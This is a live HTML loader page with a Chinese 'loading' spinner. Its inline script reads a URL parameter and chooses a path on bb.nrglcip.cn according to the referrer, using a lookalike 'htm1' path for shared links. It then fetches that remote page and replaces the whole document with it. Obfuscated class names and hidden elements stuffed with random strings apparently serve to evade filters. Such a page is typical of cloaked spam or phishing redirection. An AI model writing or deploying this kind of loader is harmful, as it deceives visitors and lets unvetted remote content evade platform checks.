<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .XMXlaeE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .XMXlaeE .vVO9fuCG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .XMXlaeE .content {
            line-height: 50px;
            text-align: center
        }

        .XMXlaeE .img {
            width: 100%
        }

        .XMXlaeE .TdJssLIf2Z {
            text-align: center
        }

        .XMXlaeE .TdJssLIf2Z span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .XMXlaeE .TdJssLIf2Z span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .XMXlaeE .TdJssLIf2Z span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .XMXlaeE .TdJssLIf2Z span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .XMXlaeE .TdJssLIf2Z span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .XMXlaeE .TdJssLIf2Z span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .XMXlaeE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XUcQSGBW9q(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DQt8D = XUcQSGBW9q('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DQt8D +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DQt8D +".html?a=share";
		}
		
        EpLOzY2GF0=url+"#"+new Date().getTime();
        EpLOzY2GF0 && function() {
            $.get(EpLOzY2GF0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >ICicFZsUr4fmhIueqx0</b>
<b style='display:none' >ICicFZsUr4fmhIueqx0</b>
<h1 style='display:none' >gYKpCYBGRMKR128SA92lOoaU1VGqTrP1ymgr1LxhSqGQxxyRDkgnHOFPzeqgOLadxWZXd</h1>
<p  style='display:none'>YTqm0yHXkFfjujA98T5le8wS1QmEZF6mNl7kr1TByrY</p>
<span style='display:none'>nLot7fasJbKifF6WCdaKxK8DBfpVg8XpgBc3nEM2ut9I21MefT9vTjkXyRc0ivqaMyPj</span>
<span style='display:none'>nLot7fasJbKifF6WCdaKxK8DBfpVg8XpgBc3nEM2ut9I21MefT9vTjkXyRc0ivqaMyPj</span><div class="XMXlaeE">
    <div class="vVO9fuCG">
        <div class="TdJssLIf2Z">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>NMl51paAQPtglmgox9YMjjsJWhcNzBhUb88VV1N8k9Gxc0hWCqKsiC12BsXGyZ7y</span>
<div style='display:none'>AcPDdUCEafODesweKRYoT8opyVjw3lHroWCorw3Wv0q9QRK4q9ENVyvZCISCliSJOA2YNLDnRQUipjjWfNIjULSG</div>
<p  style='display:none'>fGeLUMJGjH24nnWJ0E656lAzRxLw8LIsVvdsOY</p>
<li style='display:none' >eydkjgeiPTKyVjaIeHxtmNuIBCGx0p0zdygSAcBb</li></body>
</html>